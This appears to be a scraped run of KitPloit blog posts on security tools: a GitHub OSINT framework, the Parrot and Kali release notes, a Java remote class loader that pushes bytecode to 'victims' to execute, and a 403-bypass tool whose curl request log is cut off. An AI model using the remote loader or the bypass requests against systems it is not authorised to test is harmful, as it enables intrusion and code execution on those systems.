src="https://blogger.googleusercontent.com/img/a/AVvXsEjJoueB5KvYq1NY5FBDb54s5y2RtkyDb-WhZNham7UiI28_Gf3kqyi5cxdNtKPN3q96mAW8RGu2mpxBf-5cfl4GYrRkNxURo8MvQ9zjsgW_-ZCK27NnyWfQlzCNVrjazwRgelnbFEuMRN0Gg8iWn5tPZsJ-HUfnY2AldmtJQMeKhx060C1NGpOoJS2SHA=w640-h360" width="640" /></a></p><p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/74001397/186889897-c1c17fac-fddc-4967-9084-39cfe2d1307f.png" rel="nofollow" target="_blank" title="Advanced Github OSINT Framework (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh0EuAYFhz1FnYrGIAS33DpulfABwiTyO1KO2X_1LeQHE7GEgb8WSALsCVRVNK5QqmyDBm8hnKdzafahwclMyQgrkUwBY6JWG4ut3p8FVcQIVP30w9aW819q8Pdd4uuWgGgRx7qlI8VaPmfx_l46vmoe-lF7YQog6o3oDNEbKbnenRJadTNkFhRwv_1Yw"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7173878151514476066" src="https://blogger.googleusercontent.com/img/a/AVvXsEh0EuAYFhz1FnYrGIAS33DpulfABwiTyO1KO2X_1LeQHE7GEgb8WSALsCVRVNK5QqmyDBm8hnKdzafahwclMyQgrkUwBY6JWG4ut3p8FVcQIVP30w9aW819q8Pdd4uuWgGgRx7qlI8VaPmfx_l46vmoe-lF7YQog6o3oDNEbKbnenRJadTNkFhRwv_1Yw=w640-h360" width="640" /></a></p><p dir="auto"><br /></p>
<p dir="auto">A framework for <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> <a href="https://www.kitploit.com/search/label/OSINT" target="_blank" title="osint">OSINT</a> on GitHub users, <a href="https://www.kitploit.com/search/label/Repositories" target="_blank" title="repositories">repositories</a> and organizations</p> <span><a name='more'></a></span><p dir="auto"><br /></p>
<h1 dir="auto">Wiki</h1> <p dir="auto"><a href="https://github.com/bellingcat/octosuite/wiki" rel="nofollow" target="_blank" title="Refer to the Wiki">Refer to the Wiki</a> for installation instructions, in addition to all other documentation.</p>
<h1 dir="auto">Features</h1>
<ul dir="auto">
<li>Fetches an organization's profile information</li>
<li>Fetches an organization's events</li>
<li>Returns an organization's repositories</li>
<li>Returns an organization's public members</li>
<li>Fetches a repository's information</li>
<li>Returns a repository's contributors</li>
<li>Returns a repository's languages</li>
<li>Fetches a repository's stargazers</li>
<li>Fetches a repository's forks</li>
<li>Fetches a repository's releases</li>
<li>Returns a list of files in a specified path of a repository</li>
<li>Fetches a user's profile information</li>
<li>Returns a user's gists</li>
<li>Returns organizations that a user owns/belongs to</li>
<li>Fetches a user's events</li>
<li>Fetches a list of users followed by the target</li>
<li>Fetches a user's followers</li>
<li>Checks if user A follows user B</li>
<li>Checks if a user is a public member of an organization</li>
<li>Returns a user's subscriptions</li>
<li>Gets a user's subscriptions</li>
<li>Gets a user's events</li>
<li>Searches users</li>
<li>Searches repositories</li>
<li>Searches topics</li>
<li>Searches issues</li>
<li>Searches commits</li>
<li>Automatically <a href="https://www.kitploit.com/search/label/Logs" target="_blank" title="logs">logs</a> network activity (.logs folder)</li>
<li>User can view, read and delete logs</li>
<li>...And more</li>
</ul>
<h2 dir="auto">Note</h2> <blockquote> <p dir="auto">Octosuite automatically logs network and user activity of each session; the logs are saved by date and time in the .logs folder</p></blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bellingcat/octosuite" rel="nofollow" target="_blank" title="Download Octosuite">Download Octosuite</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-26101927905293205712022-10-07T00:56:00.001-03:002022-10-07T00:56:23.199-03:00Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjurce2jTY2YVJZXrwfGY2YzGs8IRoQDZP9GFfbWnS__2Ccg1WL0jpqJ9B1PhfVz3OugUjVM9tiOZKoJ4fXljNnubNjfrbJHwp9zJrFNnNfHKJNPK9E8d9MI8OFP4qV2P6EL0vrDq7ePBcN38O6WxI3RYGG0Wh--fvDXE56ukC9tk2t3WrHOc6-Y0BZoA/s1920/parrot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="984" data-original-width="1920" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjurce2jTY2YVJZXrwfGY2YzGs8IRoQDZP9GFfbWnS__2Ccg1WL0jpqJ9B1PhfVz3OugUjVM9tiOZKoJ4fXljNnubNjfrbJHwp9zJrFNnNfHKJNPK9E8d9MI8OFP4qV2P6EL0vrDq7ePBcN38O6WxI3RYGG0Wh--fvDXE56ukC9tk2t3WrHOc6-Y0BZoA/w640-h328/parrot.png" width="640" /></a></div><p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Parrot
OS 5.1 is officially released.
We're proud to say that the new version of Parrot OS 5.1 is available
for download; this new version includes a lot of improvements and
updates that make the distribution more performant and more secure.<span></span></p><a name='more'></a><p></p>
<h3 style="text-align: left;">How do I get Parrot OS?</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You can download Parrot OS by clicking <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="http://parrotsec.org/download">here</a> and, as always, we invite you to never trust third-party and unofficial sources.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">If
you need any help or in case the direct downloads don't work for you,
we also provide official Torrent files, which can circumvent firewalls
and network restrictions in most cases.</p>
<h3 style="text-align: left;">How do I upgrade from a previous version?</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">First of all, we always suggest updating your version to be sure that it is stable and functional.
You can upgrade an existing system via APT using one of the following commands:</p>
<ul>
<li><code>sudo parrot-upgrade</code></li>
</ul>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">or</p>
<ul>
<li><code>sudo apt update && sudo apt full-upgrade</code></li>
</ul>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Even
though we recommend always updating your version, we also recommend
taking a backup and re-installing the latest version for a cleaner and
more reliable user experience, especially if you are upgrading from a very old
version of Parrot.</p>
<h2 style="text-align: left;">What's new in Parrot OS 5.1</h2>
<h3 style="text-align: left;">New kernel 5.18.</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You can find all the information about the new kernel 5.18 by clicking on this <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="https://kernelnewbies.org/Linux_5.18#fprobe.2C_for_probing_multiple_functions_with_a_single_probe_handler">link</a>.</p>
<h3 style="text-align: left;">Updated docker containers</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our docker offering has been revamped!
We now provide our dedicated <strong>parrot.run</strong> image registry along with the default <strong>docker.io</strong> one.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">All our images are now natively multiarch, and support amd64 and arm64 architectures.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our container offering was updated as well, and we are committed to improving it further.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Run <code>docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core</code> and give our containers a try without having to install the system, or visit our <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="https://docs.parrotsec.org/docs/cloud/parrot-on-docker">Docker images page</a> to explore the other containers we offer.</p>
<h3 style="text-align: left;">Updated backports.</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Several
packages were updated and backported, like the new Golang 1.19 or
LibreOffice 7.4. This is part of our commitment to provide the latest
version of the most important software while keeping a stable LTS
release model.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">To make sure you have all the latest packages installed from our backports channel, use the following commands:</p>
<ul>
<li><code>sudo apt update</code></li>
<li><code>sudo apt full-upgrade -t parrot-backports</code></li>
</ul>
<h3 style="text-align: left;">System updates</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
system has received important updates to some of its key packages,
like parrot-menu, which now provides additional launchers to our newly
imported tools; or parrot-core, which now provides a new Firefox profile
with improved security hardening, plus some minor bugfixes to our zshrc
configuration.</p>
<h3 style="text-align: left;">Firefox profile overhaul</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">As
mentioned earlier, our Firefox profile has received a major update that
significantly improves the overall privacy and security.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our
bookmarks collection has been revamped, and now includes new resources,
including OSINT services, new learning sources and other useful
resources for hackers, developers, students and security researchers.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">We
have also stepped up our effort to avoid Mozilla telemetry and brought
DuckDuckGo back as the default search engine, while we explore
other alternatives for the future.</p>
<h3 style="text-align: left;">Tools updates</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Important updates involved metasploit, exploitdb and other popular tools as well.</p>
<h3 style="text-align: left;">New AnonSurf 4.0</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">AnonSurf is our in-house anonymity solution that routes all system traffic through Tor automatically, without having to set up proxy settings for each individual program, and prevents traffic leaks in most cases.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The new version provides significant fixes and reliability updates, fully supports Debian systems without the old resolvconf setup, has a new user interface with an improved system tray icon and settings dialog window, and offers a better overall user experience.</p>
<h3 style="text-align: left;">Parrot IoT improvements</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our
IoT version now implements significant performance improvements for the
various Raspberry Pi boards, and finally includes Wi-Fi support for the
Raspberry Pi 400 board.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
Parrot IoT offering has also been expanded, and it now offers Home and
Security editions as well, with a full MATE desktop environment exactly
like the desktop counterpart.</p>
<h3 style="text-align: left;">Architect Edition improvements</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The Architect Edition is a special edition of Parrot that lets the user install a bare-bones Parrot Core system and then offers a selection of additional modules to further customize the system.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You
can use Parrot Architect to install other desktop environments like
KDE, GNOME or XFCE, or to install a specific selection of tools.</p>
<h3 style="text-align: left;">New infrastructure powered by Parrot and Kubernetes</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
Architect Edition is also used internally by the Parrot Engineering
Team to install Parrot Server Edition on all the servers that power our
infrastructure, which is officially 100% powered by Parrot and
Kubernetes.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">This
is a major change in the way we handle our infrastructure, which
enables us to implement better autoscaling, easier management, smaller
attack surface and an overall better network, with the improved
scalability and security we were looking for.</p><br /><br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://download.parrotsec.org/parrot/iso/4.7/" target="_blank">Download Parrot Security 5.1</a></span></b></div>
2022-10-03T08:30:00.008-03:00 Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API<h1 align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjqbe2HDYDVxwhQXJc8nseuijMlm0-Dsr3zPALzOUbgLU1XUJ-hojss3deLf8oGSz703t1AqEL78YrOrIS61IfcpflmzjMfHn_blwBvu8aVlBtgWyfppjE3QBKvB62w5E04x4p054EG0--jEFzkEB_M6VF72LrvpLALNTJ-6LbMd5bVtPyl7n7JKeBeAA"><img alt="" border="0" height="282" id="BLOGGER_PHOTO_ID_7148294780622538178" src="https://blogger.googleusercontent.com/img/a/AVvXsEjqbe2HDYDVxwhQXJc8nseuijMlm0-Dsr3zPALzOUbgLU1XUJ-hojss3deLf8oGSz703t1AqEL78YrOrIS61IfcpflmzjMfHn_blwBvu8aVlBtgWyfppjE3QBKvB62w5E04x4p054EG0--jEFzkEB_M6VF72LrvpLALNTJ-6LbMd5bVtPyl7n7JKeBeAA=w640-h282" width="640" /></a> <br /> </h1> <p dir="auto">This tool allows you to send Java <a href="https://www.kitploit.com/search/label/Bytecode" target="_blank" title="bytecode">bytecode</a> in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The <a href="https://www.kitploit.com/search/label/Client" target="_blank" title="client">client</a> receives the class file from the server and returns the respective execution output. 
Payloads must be written in Java and compiled before starting the server.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Features</h1> <ul dir="auto"> <li>Client-server architecture</li> <li>Remote loading of Java class files</li> <li>In-transit <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> using ChaCha20 cipher</li> <li>Settings defined via args</li> <li>Keepalive mechanism to re-establish communication if server restarts</li> </ul> <h1 dir="auto">Installation</h1> <p dir="auto">The tool has been tested using OpenJDK 11 with JRE Java Package, both on <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux (zip portable version). Java version should be 11 or higher due to dependencies.</p> <p dir="auto"><a href="https://www.openlogic.com/openjdk-downloads" rel="nofollow" target="_blank" title="https://www.openlogic.com/openjdk-downloads">https://www.openlogic.com/openjdk-downloads</a></p> <h1 dir="auto">Usage</h1> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" dir="auto"><pre><code>$ java -jar java-class-loader.jar -help<br /><br />usage: Main<br /> -address &lt;arg&gt;       address to connect (client) / to bind (server)<br /> 
-classfile &lt;arg&gt;     filename of bytecode .class file to load remotely<br />                      (default: Payload.class)<br /> -classmethod &lt;arg&gt;   name of method to invoke (default: exec)<br /> -classname &lt;arg&gt;     name of class (default: Payload)<br /> -client              run as client<br /> -help                print this message<br /> -keepalive           keeps the client getting classfile from server every<br />                      X seconds (default: 3 seconds)<br /> -key &lt;arg&gt;           secret key - 256 bits in base64 format (if not<br />                      specified it will generate a new one)<br /> -port &lt;arg&gt;          port to connect (client) / to bind (server)<br /> -server              run as server</code></pre></div> <h1 dir="auto">Example</h1> <p dir="auto">Assuming you have the following Hello World payload in the <code>Payload.java</code> file:</p> <div class="highlight highlight-source-java notranslate position-relative overflow-auto" dir="auto"><pre><code>//Payload.java<br />public class Payload {<br />    public static String exec() {<br />        String output = "";<br />        try {<br />            output = "Hello world from client!";<br />        } catch (Exception e) {<br />            e.printStackTrace();<br />        }<br />        return output;<br />    }<br />}</code></pre></div> <p dir="auto">Then you should compile and produce the respective <code>Payload.class</code> file.</p> <p dir="auto">To run the server process listening on port 1337 on all net interfaces:</p> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" dir="auto"><pre><code>$ 
java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class<br /><br />Running as server<br />Server running on 0.0.0.0:1337<br />Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=</code></pre></div> <p dir="auto">On the client side, you may use the same JAR package with the <code>-client</code> flag and the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are <code>Payload</code> and <code>String exec()</code> respectively). Additionally, you can specify <code>-keepalive</code> to keep the client requesting the class file from the server while maintaining the connection.</p> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" dir="auto"><pre><code>$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=<br /><br />Running as client<br />Connecting to 192.168.1.73:1337<br />Received 593 bytes from server<br />Output from invoked class method: Hello world from client!<br />Sent 24 bytes to server</code></pre></div> <h1 dir="auto">References</h1> <p dir="auto">Refer to <a href="https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/" rel="nofollow" target="_blank" title="https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/">https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/</a> for a blog post related to the development of this tool.</p> <ol dir="auto"> <li> <p dir="auto"><a href="https://github.com/rebeyond/Behinder" rel="nofollow" target="_blank" title="https://github.com/rebeyond/Behinder">https://github.com/rebeyond/Behinder</a></p> </li> <li> <p dir="auto"><a href="https://github.com/AntSwordProject/antSword" rel="nofollow" target="_blank" title="https://github.com/AntSwordProject/antSword">https://github.com/AntSwordProject/antSword</a></p> </li> <li> <p dir="auto"><a href="https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/" rel="nofollow" target="_blank" title="https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/">https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/</a></p> </li> <li> <p dir="auto"><a href="https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis" rel="nofollow" target="_blank" title="https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis">https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis</a></p> </li> <li> <p dir="auto"><a href="https://xz.aliyun.com/t/2799" rel="nofollow" target="_blank" title="https://xz.aliyun.com/t/2799">https://xz.aliyun.com/t/2799</a></p> </li> <li> <p dir="auto"><a href="https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7" 
rel="nofollow" target="_blank" title="https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7">https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7</a></p> </li> <li> <p dir="auto"><a href="https://venishjoe.net/post/dynamically-load-compiled-java-class/" rel="nofollow" target="_blank" title="https://venishjoe.net/post/dynamically-load-compiled-java-class/">https://venishjoe.net/post/dynamically-load-compiled-java-class/</a></p> </li> <li> <p dir="auto"><a href="https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php" rel="nofollow" target="_blank" title="https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php">https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php</a></p> </li> <li> <p dir="auto"><a href="https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/" rel="nofollow" target="_blank" title="https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/">https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/</a></p> </li> <li> <p dir="auto"><a href="https://openjdk.org/jeps/329" rel="nofollow" target="_blank" title="https://openjdk.org/jeps/329">https://openjdk.org/jeps/329</a></p> </li> <li> <p dir="auto"><a href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html" rel="nofollow" target="_blank" title="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html">https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html</a></p> </li> <li> <p dir="auto"><a href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html" rel="nofollow" target="_blank" title="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html">https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html</a></p> </li> 
</ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/joaovarelas/java-remote-class-loader" rel="nofollow" target="_blank" title="Download Java-Remote-Class-Loader">Download Java-Remote-Class-Loader</a></span></b></div>2022-08-11T02:08:00.003-04:00 Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbHClh2kvbaX_X8Dc86ZcAQSmWrfQypGElk6SGE_vNyFQNPOIMVQAksldW4kYpROJ8fckz-pHzqCFp8F8gOcqX2ddY_vfV-mQhb_UODttoxdCuC-VdhbgrZ8iabVUcytfPKCoOvESPOP939r84L2KvMwzGAEQVt3pVrgjt51fCZxL9aM7zGWH9-bpc/s1200/banner-2022.3-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbHClh2kvbaX_X8Dc86ZcAQSmWrfQypGElk6SGE_vNyFQNPOIMVQAksldW4kYpROJ8fckz-pHzqCFp8F8gOcqX2ddY_vfV-mQhb_UODttoxdCuC-VdhbgrZ8iabVUcytfPKCoOvESPOP939r84L2KvMwzGAEQVt3pVrgjt51fCZxL9aM7zGWH9-bpc/w640-h334/banner-2022.3-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The highlights for Kali’s 2022.3’s release:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-is-on-discord">Discord Server</a></strong> - Kali’s new community real-time chat option has launched!</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#test-lab-environment">Test Lab Environment</a></strong> - Quickly create a test bed to learn, practice, and benchmark tools and compare their results</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-tools-documentation">Opening Kali-Tools Repo</a></strong> - We have opened up the Kali tools repository & are accepting your submissions!</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#help-wanted">Help Wanted</a></strong> - We are looking for a Go developer to help us on an open-source project</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-nethunter-updates">Kali NetHunter Updates</a></strong> - New releases in our NetHunter store</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-for-virtual-machines">Virtual Machines Updates</a></strong> - New VirtualBox image format, weekly images, and build-scripts to build your own</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#new-tools-in-kali">New Tools In Kali</a></strong> - Would not be a release without some new tools!</li></ul><p><em>For more details, see the <a href="https://bugs.kali.org/changelog_page.php">bug tracker changelog</a>.</em></p><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-3-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.3</a></span></b></div></div>2022-07-13T08:30:00.004-04:00 Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdjAiwVNTJ_mp8hhpg1tSiUV4pPg6KW1ceU4DszQH_kNkJqVXShA7Hj9fzygTYaj7LtxmnMuuyDIQwWnHe8WPhQTICmZBxf27PPDzeVy0h5RFSj3YooR6g7tRn7Sg0qCe4ehzq5BywDq6rtdSLIS7_5loHWtA5pvnWCsIWAp3eSVhvTaF7IIogOs8/s967/bypass-url-parser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="967" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdjAiwVNTJ_mp8hhpg1tSiUV4pPg6KW1ceU4DszQH_kNkJqVXShA7Hj9fzygTYaj7LtxmnMuuyDIQwWnHe8WPhQTICmZBxf27PPDzeVy0h5RFSj3YooR6g7tRn7Sg0qCe4ehzq5BywDq6rtdSLIS7_5loHWtA5pvnWCsIWAp3eSVhvTaF7IIogOs8/w640-h360/bypass-url-parser.png" width="640" /></a></div><p><br /></p> <p dir="auto">Tool that tests <code>MANY</code> url bypasses to reach a <code>40X protected page</code>.</p> <p dir="auto">If you wonder why this code is <code>nothing but a dirty curl wrapper</code>, here's why:</p> <ul dir="auto"> <li>Most of the python requests do url/path/parameter encoding/decoding, and I hate this.</li> <li>If I submit raw chars, I want raw chars to be sent.</li> <li>If I send a weird path, I want it weird, not normalized.</li> </ul> <p dir="auto">This is <code>surprisingly hard</code> to achieve in python without losing all of the lib goodies like parsing, <a href="https://www.kitploit.com/search/label/SSL/TLS" target="_blank" title="ssl/tls">ssl/tls</a> encapsulation and so on. 
<br /> So, be like me, use <code>curl as a backend</code>, it's gonna be just fine.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Setup for bypass.py</h2> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto"><pre><code># Deps<br />sudo apt install -y bat curl virtualenv python3<br /># Tool<br />virtualenv -p python3 .py3<br />source .py3/bin/activate<br />pip install -r requirements.txt<br />./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"</code></pre></div> <h2 dir="auto">Usage</h2> <div>Expected result <div><pre><code>2022-05-10 15:54:03 work bup[738125] INFO === Config ===<br />2022-05-10 15:54:03 work bup[738125] INFO debug: False<br />2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list<br />2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser<br />2022-05-10 15:54:03 work bup[738125] INFO threads: 20<br />2022-05-10 15:54:03 work bup[738125] INFO timeout: 2<br />2022-05-10 15:54:03 work bup[738125] INFO headers: {}<br />2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls<br />2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com<br />2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list<br />2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 
'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w 